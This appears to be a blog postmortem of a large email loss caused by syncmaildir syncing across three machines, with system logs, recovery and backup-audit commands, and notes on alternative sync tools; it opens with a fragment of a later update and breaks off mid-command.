while read qid ; do grep "$qid: message-id" /var/log/mail.log; done < qids | sed 's/.*message-id=<//;s/>//' | while read msgid; do sudo -u anarcat notmuch count --exclude=false id:$msgid | grep -q 0 && echo $msgid ; done
Then, crucial moment, try to pull the new mails from the backups on curie:
anarcat@curie:~(main)$ smd-pull  -n  --show-tags -v
Found lockfile of a dead instance. Ignored.
Phase 0: handshake
Phase 1: changes detection
    5K emails scanned
   10K emails scanned
   15K emails scanned
   20K emails scanned
   25K emails scanned
   30K emails scanned
   35K emails scanned
   40K emails scanned
   45K emails scanned
   50K emails scanned
Phase 2: synchronization
Phase 3: agreement
default: smd-client@localhost: TAGS: stats::new-mails(49687), del-mails(0), bytes-received(215752279), xdelta-received(3703852)
"smd-pull  -n  --show-tags -v" took 3 mins 39 secs
This brought me back to the state after the backup plus the mails delivered during the day, which means I had to catch up with all the mail I had read over the holidays (1440 mails!). But thankfully I made a dump of the notmuch database on curie at the start of the procedure, so this actually restored a sane state:
pv notmuch.dump | notmuch restore
Phew!

Workaround I have filed this as a bug in upstream issue 18. Considering I filed 11 issues and only 3 of those were closed, I'm not holding my breath. I nevertheless filed PR 19 in the hope that this will fix my particular issue, but I'm not even sure this is the right fix...
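In the meantime, a belt-and-suspenders workaround is to make sure push and pull can never run concurrently at all, by wrapping both under one lock. A minimal sketch with flock(1); the wrapper name and lock file path are my own choices, not anything smd provides:
#!/bin/sh
# smd-exclusive: run an smd command under a single global lock so that
# smd-pull and smd-push can never overlap (lock path is my choice)
exec flock --nonblock "${XDG_RUNTIME_DIR:-/tmp}/smd-global.lock" "$@"
The systemd units would then run something like smd-exclusive smd-pull instead of calling smd-pull directly; with --nonblock, the wrapped command is simply skipped if the other one is still running.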

Fix At this point, I'm really ready to give up on SMD. It's really, really nice to be able to sync mail over SSH, because I don't need to store my IMAP password on disk. But surely there are more reliable syncing mechanisms. I do not remember ever losing that much mail before. At worst, offlineimap would duplicate emails like mad, but it never destroyed my entire mail spool that way. As mentioned before, there are other programs that sync mail. I'm looking at:
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, see comment below
  • isync/mbsync: might be faster, I remember having trouble switching from offlineimap to this, has support for TLS client certs, running over SSH, and generally has good words from multiple Debian and notmuch people
  • getmail: just downloads email, might not be enough
  • nncp: treat the local spool as another mail server, might not be compatible with my "multiple clients" setup
  • doveadm-sync: requires dovecot on both ends, but supports using SSH to sync, will try this next, may have performance problems, see comment below
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, seems awfully complicated to setup, mentions rsmtp which is a nice name for rsendmail

23 March 2021

Antoine Beaupré: Major email crash with syncmaildir

TL;DR: lost half my mail (150,000 messages, ~6GB) last night. Cause uncertain, but possibly a combination of a dead CMOS battery, systemd OnCalendar=daily, a (locking?) bug in syncmaildir and, generally, a system too exotic and complicated.

The crash So I somehow lost half my mail:
anarcat@angela:~(main)$ du -sh Maildir/
7,9G    Maildir/
anarcat@curie:~(main)$ du -sh Maildir
14G     Maildir
anarcat@marcos:~$ du -sh Maildir
8,0G    Maildir
Those are three different machines:
  • angela: my laptop, not always on
  • curie: my workstation, mostly always on
  • marcos: my mail server, always on
Those mails are synchronized using a rather exotic system based on SSH, syncmaildir and rsendmail. The anomaly started on curie:
-- Reboot --
mar 22 16:13:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:13:00 curie smd-pull[4801]: rm: cannot remove '/home/anarcat/.smd/workarea/Maildir': Directory not empty
mar 22 16:13:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:13:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:13:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:14:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:14:00 curie smd-pull[7025]:  4091 ?        00:00:00 smd-push
mar 22 16:14:00 curie smd-pull[7025]: Already running.
mar 22 16:14:00 curie smd-pull[7025]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:14:00 curie smd-pull[7025]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 4091) run(rm /home/anarcat/.smd/lock))
mar 22 16:14:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:14:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:14:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
Then it seems like smd-push (from curie) started destroying the universe for some reason:
mar 22 16:20:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:20:00 curie smd-pull[9319]:  4091 ?        00:00:00 smd-push
mar 22 16:20:00 curie smd-pull[9319]: Already running.
mar 22 16:20:00 curie smd-pull[9319]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:20:00 curie smd-pull[9319]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(ru
mar 22 16:20:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:20:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:20:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:21:34 curie smd-push[4091]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:21:35 curie smd-push[9374]: register: smd-client@smd-server-register: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:21:35 curie systemd[3199]: smd-push.service: Succeeded.
Notice the del-mails(293920) there: it is actively trying to destroy basically every email in my mail spool. Then somehow push and pull started both at once:
mar 22 16:21:35 curie systemd[3199]: Started push emails with syncmaildir.
mar 22 16:21:35 curie systemd[3199]: Starting push emails with syncmaildir...
mar 22 16:22:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:22:00 curie smd-pull[10333]:  9455 ?        00:00:00 smd-push
mar 22 16:22:00 curie smd-pull[10333]: Already running.
mar 22 16:22:00 curie smd-pull[10333]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:22:00 curie smd-pull[10333]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(r
mar 22 16:22:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:22:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:22:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: Data transmission failed.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: Unable to open Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: Maildir/.kobo/cur/1498563708.M122624P22121.marco
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: Unable to open requested file.
mar 22 16:22:00 curie smd-push[9455]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:22:00 curie smd-push[9455]: default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:22:00 curie smd-push[9455]: default: smd-server@localhost: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested-actions(r
mar 22 16:22:00 curie systemd[3199]: smd-push.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:22:00 curie systemd[3199]: smd-push.service: Failed with result 'exit-code'.
mar 22 16:22:00 curie systemd[3199]: Failed to start push emails with syncmaildir.
There it seems push tried to destroy the universe again: del-mails(293920). Interestingly, the push started again in parallel with the pull, right that minute:
mar 22 16:22:00 curie systemd[3199]: Starting push emails with syncmaildir...
... but didn't complete for a while, here's pull trying to start again:
mar 22 16:24:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:24:00 curie smd-pull[12051]: 10466 ?        00:00:00 smd-push
mar 22 16:24:00 curie smd-pull[12051]: Already running.
mar 22 16:24:00 curie smd-pull[12051]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:24:00 curie smd-pull[12051]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 10466) run(rm /home/anarcat/.smd/lock))
mar 22 16:24:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:24:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:24:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
... and the long push finally resolving:
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: Data transmission failed.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: Data transmission failed.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: Unable to open Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: No such file or directory
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: Unable to open requested file.
mar 22 16:24:00 curie smd-push[10466]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:24:00 curie smd-push[10466]: default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:24:00 curie smd-push[10466]: default: smd-server@localhost: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:24:00 curie systemd[3199]: smd-push.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:24:00 curie systemd[3199]: smd-push.service: Failed with result 'exit-code'.
mar 22 16:24:00 curie systemd[3199]: Failed to start push emails with syncmaildir.
mar 22 16:24:00 curie systemd[3199]: Starting push emails with syncmaildir...
This pattern repeats until 16:35, when that locking issue silently recovered somehow:
mar 22 16:35:03 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:35:41 curie smd-pull[20788]: default: smd-client@localhost: TAGS: stats::new-mails(5), del-mails(1), bytes-received(21885), xdelta-received(6863398)
mar 22 16:35:42 curie smd-pull[21373]: register: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:35:42 curie systemd[3199]: smd-pull.service: Succeeded.
mar 22 16:35:42 curie systemd[3199]: Started pull emails with syncmaildir.
mar 22 16:36:35 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:36:36 curie smd-pull[21738]: default: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(214)
mar 22 16:36:37 curie smd-pull[21816]: register: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:36:37 curie systemd[3199]: smd-pull.service: Succeeded.
mar 22 16:36:37 curie systemd[3199]: Started pull emails with syncmaildir.
... notice that huge xdelta-received there, that's 7GB right there. Mysteriously, the curie mail spool survived this, possibly because smd-pull started failing again:
mar 22 16:38:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:38:00 curie smd-pull[23556]: 21887 ?        00:00:00 smd-push
mar 22 16:38:00 curie smd-pull[23556]: Already running.
mar 22 16:38:00 curie smd-pull[23556]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:38:00 curie smd-pull[23556]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 21887) run(rm /home/anarcat/.smd/lock))
mar 22 16:38:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:38:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:38:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
That could have been when I got on angela to check my mail, and it was busy doing the nasty removal stuff... although the times don't match. Here is when angela came back online:
anarcat@angela:~(main)$ last
anarcat  :0           :0               Mon Mar 22 19:57   still logged in
reboot   system boot  5.10.0-0.bpo.3-a Mon Mar 22 19:57   still running
anarcat  :0           :0               Mon Mar 22 17:43 - 18:47  (01:03)
reboot   system boot  5.10.0-0.bpo.3-a Mon Mar 22 17:39   still running
Then finally the sync on curie started failing with:
mar 22 16:46:35 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:46:42 curie smd-pull[27455]: smd-server: ERROR: Client aborted, removing /home/anarcat/.smd/curie-anarcat__Maildir.db.txt.new and /home/anarcat/.smd/curie-anarcat__Maildir.db.txt.mtime.new
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: Failed to copy Maildir/.debian/cur/1613401668.M901837P27073.marcos,S=3740,W=3815:2,S to Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: The destination already exists but its content differs.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: To fix this problem you have two options:
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: - rename Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S by hand so that Maildir/.debian/cur/1613401668.M901837P27073.marcos,S=3740,W=3815:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   can be copied without replacing it.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   Executing  cd; mv -n "Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S" "Maildir/.koumbit/cur/1616446002.1.localhost"  should work.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: - run smd-push so that your changes to Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   are propagated to the other mailbox
mar 22 16:46:42 curie smd-pull[27455]: default: smd-client@localhost: TAGS: error::context(copy-message) probable-cause(concurrent-mailbox-edit) human-intervention(necessary) suggested-actions(run(mv -n "/home/anarcat/.smd/workarea/Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S" "/home/anarcat/.smd/workarea/Maildir/.koumbit/tmp/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S") run(smd-push default))
mar 22 16:46:42 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:46:42 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:46:42 curie systemd[3199]: Failed to start pull emails with syncmaildir.
It went on like this until I found the problem. This was, presumably, a good thing, because it meant those emails were not being destroyed. On angela, things looked like this:
-- Reboot --
mar 22 17:39:29 angela systemd[1677]: Started run notmuch new at least once a day.
mar 22 17:39:29 angela systemd[1677]: Started run smd-pull regularly.
mar 22 17:40:46 angela systemd[1677]: Starting pull emails with syncmaildir...
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: Unable to open Maildir/.tor/new/1616446842.M285912P26118.marcos,S=8860,W=8996: Maildir/.tor/new/1616446842.M285912P26118.marcos,S=886
0,W=8996: No such file or directory
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: Unable to open requested file.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: Data transmission failed.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: This problem is transient, please retry.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: server sent ABORT or connection died
mar 22 17:43:18 angela smd-pull[3916]: default: smd-server@smd-server-anarcat: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested
-actions(retry)
mar 22 17:43:18 angela smd-pull[3916]: default: smd-client@localhost: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 17:43:18 angela systemd[1677]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 17:43:18 angela systemd[1677]: smd-pull.service: Failed with result 'exit-code'.
mar 22 17:43:18 angela systemd[1677]: Failed to start pull emails with syncmaildir.
mar 22 17:43:18 angela systemd[1677]: Starting pull emails with syncmaildir...
mar 22 17:43:29 angela smd-pull[4847]: default: smd-client@localhost: TAGS: stats::new-mails(29), del-mails(0), bytes-received(401519), xdelta-received(38914)
mar 22 17:43:29 angela smd-pull[5600]: register: smd-client@localhost: TAGS: stats::new-mails(2), del-mails(0), bytes-received(92150), xdelta-received(471)
mar 22 17:43:29 angela systemd[1677]: smd-pull.service: Succeeded.
mar 22 17:43:29 angela systemd[1677]: Started pull emails with syncmaildir.
mar 22 17:43:29 angela systemd[1677]: Starting push emails with syncmaildir...
mar 22 17:43:32 angela smd-push[5693]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(217)
mar 22 17:43:33 angela smd-push[6575]: register: smd-client@smd-server-register: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(219)
mar 22 17:43:33 angela systemd[1677]: smd-push.service: Succeeded.
mar 22 17:43:33 angela systemd[1677]: Started push emails with syncmaildir.
Notice how long it took to get the first error, in that first failure: it failed after 3 minutes! Presumably that's when it started deleting all that mail. And this is during pull, not push, so the error didn't come from angela.

Affected data It seems 2GB of mail from my main INBOX was destroyed. Another 2.4GB of spam (kept for training purposes) was also destroyed, along with 700MB of Sent mail. The rest is hard to figure out, because the folders are actually still there, just smaller. So I relied on ncdu to figure out the size changes. (Note that I don't really archive (or delete much of) my mail since I use notmuch, which is why the INBOX is so large...) Concretely, according to the notmuch-new.service which still runs periodically on marcos, here are the changes that happened on the server:
mar 22 16:17:12 marcos notmuch[10729]: Added 7 new messages to the database. Removed 57985 messages. Detected 1372 file renames.
mar 22 16:22:43 marcos notmuch[12826]: No new mail. Removed 143842 messages. Detected 6072 file renames.
mar 22 16:27:02 marcos notmuch[13969]: No new mail. Removed 82071 messages. Detected 1783 file renames.
mar 22 16:29:45 marcos notmuch[15079]: Added 22743 new messages to the database. Detected 1 file rename.
mar 22 16:31:48 marcos notmuch[16196]: Added 22779 new messages to the database. Removed 5 messages.
mar 22 16:33:11 marcos notmuch[17192]: Added 3711 new messages to the database.
mar 22 16:40:41 marcos notmuch[19122]: Added 74558 new messages to the database. Detected 1 file rename.
mar 22 16:43:21 marcos notmuch[20325]: Added 9061 new messages to the database. Detected 4 file renames.
mar 22 17:43:08 marcos notmuch[7420]: Added 1793 new messages to the database. Detected 6 file renames.
That is basically the entire mail spool destroyed at first (283 898 messages), and then bits and pieces of it progressively re-added (134 645 messages), somehow, so 149 253 mails were lost, presumably.

Recovery I disabled the services all over the place:
systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
(Well, technically, I did that only on angela, as I thought the problem was there. Luckily, curie kept going, but it seems that was harmless.) I made a backup of the mail spool on curie:
tar cf - Maildir/ | pv -s 14G | gzip -c > Maildir.tgz
Then I crossed my fingers and ran smd-push -v -s, as that was suggested by smd error codes themselves. That thankfully started restoring mail. It failed a few times on weird cases of files being duplicates, but I resolved this by following the instructions. Or mostly: I actually deleted the files instead of moving them, which made smd even unhappier (if there ever was such a thing). I had to recreate some of those files, so, lesson learned: do follow the advice smd gives you, even if it seems useless or strange. But then smd-push was humming along, uploading tens of thousands of messages, saturating the upload in the office, refilling the mail spool on the server... yaay!... ? Except... well, of course that didn't quite work: the mail spool in the office eventually started to grow beyond the size of the mail spool on the workstation. That is what smd-push eventually settled on:
default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(151697), del-mails(0), bytes-received(7539147811), xdelta-received(10881198)
It recreated 151 697 emails, adding about 2000 emails to the pool, kind of from nowhere at all. On marcos, before:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------
    4,0 GiB [##########] /.notmuch
  717,3 MiB [#         ] /.Archives.2014
  498,2 MiB [#         ] /.feeds.debian-planet
  453,1 MiB [#         ] /.Archives.2012
  414,5 MiB [#         ] /.debian
  408,2 MiB [#         ] /.quoifaire
  389,8 MiB [          ] /.rapports
  356,6 MiB [          ] /.tor
  182,6 MiB [          ] /.koumbit
  179,8 MiB [          ] /tmp
   56,8 MiB [          ] /.nn
   43,0 MiB [          ] /.act-mtl
   32,6 MiB [          ] /.feeds.sysadvent
   31,7 MiB [          ] /.feeds.releases
   31,4 MiB [          ] /.Sent.2005
   26,3 MiB [          ] /.sage
   25,5 MiB [          ] /.freedombox
   24,0 MiB [          ] /.feeds.git-annex
   21,1 MiB [          ] /.Archives.2011
   19,1 MiB [          ] /.Sent.2003
   16,7 MiB [          ] /.bugtraq
   16,2 MiB [          ] /.mlug
 Total disk usage:   8,0 GiB  Apparent size:   7,6 GiB  Items: 184426
After:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------
    4,7 GiB [##########] /.notmuch
    2,7 GiB [#####     ] /.junk
    1,9 GiB [###       ] /cur
  717,3 MiB [#         ] /.Archives.2014
  659,3 MiB [#         ] /.Sent
  513,9 MiB [#         ] /.Archives.2012
  498,2 MiB [#         ] /.feeds.debian-planet
  449,6 MiB [          ] /.Archives.2015
  414,5 MiB [          ] /.debian
  408,2 MiB [          ] /.quoifaire
  389,8 MiB [          ] /.rapports
  380,8 MiB [          ] /.Archives.2013
  356,6 MiB [          ] /.tor
  261,1 MiB [          ] /.Archives.2011
  240,9 MiB [          ] /.koumbit
  183,6 MiB [          ] /.Archives.2010
  179,8 MiB [          ] /tmp
  128,4 MiB [          ] /.lists
  106,1 MiB [          ] /.inso-interne
  103,0 MiB [          ] /.github
   75,0 MiB [          ] /.nanog
   69,8 MiB [          ] /.full-disclosure
 Total disk usage:  16,2 GiB  Apparent size:  15,5 GiB  Items: 341143
That is 156 717 files more. On curie:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------------------------------------
    2,7 GiB [##########] /.junk
    2,3 GiB [########  ] /.notmuch
    1,9 GiB [######    ] /cur
  661,2 MiB [##        ] /.Archives.2014
  655,3 MiB [##        ] /.Sent
  512,0 MiB [#         ] /.Archives.2012
  447,3 MiB [#         ] /.Archives.2015
  438,5 MiB [#         ] /.feeds.debian-planet
  406,5 MiB [#         ] /.quoifaire
  383,6 MiB [#         ] /.debian
  378,6 MiB [#         ] /.Archives.2013
  303,3 MiB [#         ] /.tor
  296,0 MiB [#         ] /.rapports
  237,6 MiB [          ] /.koumbit
  233,2 MiB [          ] /.Archives.2011
  182,1 MiB [          ] /.Archives.2010
  127,0 MiB [          ] /.lists
  104,8 MiB [          ] /.inso-interne
  102,7 MiB [          ] /.register
   89,6 MiB [          ] /.github
   67,1 MiB [          ] /.full-disclosure
   66,5 MiB [          ] /.nanog
 Total disk usage:  13,3 GiB  Apparent size:  12,6 GiB  Items: 342465
Interestingly, there are more files, but less disk usage. It's possible the notmuch database there is more efficient. So maybe there's nothing to worry about. Last night's marcos backup has:
root@marcos:/home/anarcat# find /mnt/home/anarcat/Maildir | pv -l | wc -l
 341k 0:00:16 [20,4k/s] [                             <=>                                                                                                                                     ]
341040
... 341040 files, which seems about right, considering some mail was delivered during the day. An audit can be performed with hashdeep:
borg mount /media/sdb2/borg/::marcos-auto-2021-03-22 /mnt
hashdeep -c sha256 -r /mnt/home/anarcat/Maildir | pv -l -s 341k > Maildir-backup-manifest.txt
And then compared with:
hashdeep -c sha256 -k Maildir-backup-manifest.txt Maildir/
Some extra files should show up in the Maildir, and very few should actually be missing, because I shouldn't have deleted the previous day's mail the very next day, or at least not much of it. The actual summary hashdeep gave me was:
hashdeep: Audit failed
   Input files examined: 0
  Known files expecting: 0
          Files matched: 339080
Files partially matched: 0
            Files moved: 782
        New files found: 107
  Known files not found: 106
So 106 files added, 107 deleted. Seems good enough for me... Postfix was stopped at Mar 22 21:12:59 to try and stop external events from confusing things even further. I reviewed the delivery log to see if mail that came in during the problem window disappeared:
grep 'dovecot:.*stored mail into mailbox' /var/log/mail.log |
  tail -20 |
  sed 's/.*msgid=<//;s/>.*//' |
  while read msgid; do 
    notmuch count --exclude=false id:$msgid |
      grep 0 && echo $msgid missing;
  done
And things looked okay. Now of course, if we go further back, we find mail I actually deleted (because I do do that sometimes), so it's hard to use this log as an audit trail. We can only hope that the curie spool is sufficiently coherent to be relied on. Worst case, we'll have to restore from last night's backup, but that's getting far away now: I get hundreds of mails a day in that mail spool, and resetting back to last night does not seem like a good idea. A dry run of smd-pull on angela seems to agree that it's missing some files:
default: smd-client@localhost: TAGS: stats::new-mails(154914), del-mails(0), bytes-received(0), xdelta-received(0)
... a number of mails somewhere in between the other two, go figure. A "wet" run of this was started, without deletion (-n), which gave us:
default: smd-client@localhost: TAGS: stats::new-mails(154911), del-mails(0), bytes-received(7658160107), xdelta-received(10837609)
Strange that it synced three fewer emails, but that's still better than nothing, and we have a mail spool on angela again:
anarcat@angela:~(main)$ notmuch new
purging with prefix '.': spam moved (0), ham moved (0), deleted (0), done
Note: Ignoring non-mail file: /home/anarcat/Maildir//.uidvalidity
Processed 1779 total files in 26s (66 files/sec.).
Added 1190 new messages to the database. Removed 3 messages. Detected 593 file renames.
tagging with prefix '.': spam, sent, feeds, koumbit, tor, lists, rapports, folders, done.
Notice how only 1190 messages were re-added; that is because I killed notmuch before it had time to remove all those mails from its database.

Possible causes I am totally at a loss as to why smd started destroying everything like it did. But a few things come to mind:
  1. I rewired my office on that day.
  2. This meant unplugging curie, the workstation.
  3. It has a bad CMOS battery (known problem), so it jumped around the time continuum a few times, sometimes by years.
  4. The smd services are run from a systemd unit with OnCalendar=*:0/2. I have heard that major time jumps can "pile up" the execution of jobs, and it seems that is what happened here (see the sketch below for a possible mitigation).
  5. It's possible that locking in smd is not as great as it could be, and that it corrupted its internal data structures on curie, which led it to command a destruction of the remote mail spool.
It's also possible that there was a disk failure on the server, marcos. But since it's running on a (software) RAID-1 array, and no errors have been found (according to dmesg), I don't think that's a plausible hypothesis.
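If the timer pile-up theory is right, a drop-in on the timers might mitigate it. This is a hedged sketch: the drop-in approach and option choices are mine, and I have not verified they would have prevented this particular crash.
# keep the smd timers from replaying missed runs after a clock jump,
# and stagger activations slightly so push and pull overlap less often
mkdir -p ~/.config/systemd/user/smd-pull.timer.d
cat > ~/.config/systemd/user/smd-pull.timer.d/override.conf <<'EOF'
[Timer]
Persistent=false
RandomizedDelaySec=30
EOF
systemctl --user daemon-reload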

Lessons learned
  1. follow what smd says, even if it seems useless or strange.
  2. trust but verify: just back up everything before you do anything, especially the largest data set.
  3. daily backups are not great for email, unless you're ready to lose a day of email (which I'm not).
  4. hashdeep is great. I keep finding new use cases for it. Last time it was to audit my camera SD card to make sure I didn't forget anything, and now this. it's fast and powerful.
  5. borg is great too. the FUSE mount was especially useful, and it was pretty fast to explore the backup, even through that overhead: checksumming 15GB of mail took about 35 minutes, which gives a respectable 8MB/s, probably bottlenecked by the crap external USB drive I use for backups (!).
  6. I really need to finish my backup system so that I have automated offsite backups, although in this case that would actually have been much slower (certainly not 8MB/s!).

Workarounds and solutions I set up fake-hwclock on curie, so that the next power failure will not upset my clock that badly. I am thinking of switching to ZFS or BTRFS for most of my filesystems, so that I can use filesystem snapshots (including remotely!) as a backup strategy. This seems so much more powerful than crawling the filesystem for changes, and allows for truly offsite backups protected from an attacker (hopefully). But it's a long way there. I'm also thinking of rebuilding my mail setup without smd. It's not the first time something like this happens with smd. It's the first time I am more confident it's the root cause of the problem, however, and it makes me really nervous for the future. I have used offlineimap in the past and it seems it was finally ported to Python 3, so that could be an option again. isync/mbsync is another option, which I tried before but do not remember why I didn't switch. A complete redesign with something like getmail and/or nncp could also be an option. But alas, I lack the time to go crazy with those experiments. Somehow, doing like everyone else and just going with Google still doesn't seem to be an option for me. Screw big tech. But I am afraid they will win, eventually. In any case, I'm just happy I got mail again, strangely.
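To make the snapshot idea concrete, a hedged sketch of what that strategy could look like; the pool and dataset names and the remote host are made up for illustration:
# take a dated snapshot of the dataset holding the mail spool
zfs snapshot tank/home@mail-2021-03-23
# send only the changes since the previous snapshot to an offsite box,
# leaving the received dataset unmounted there (-u)
zfs send -i tank/home@mail-2021-03-22 tank/home@mail-2021-03-23 | \
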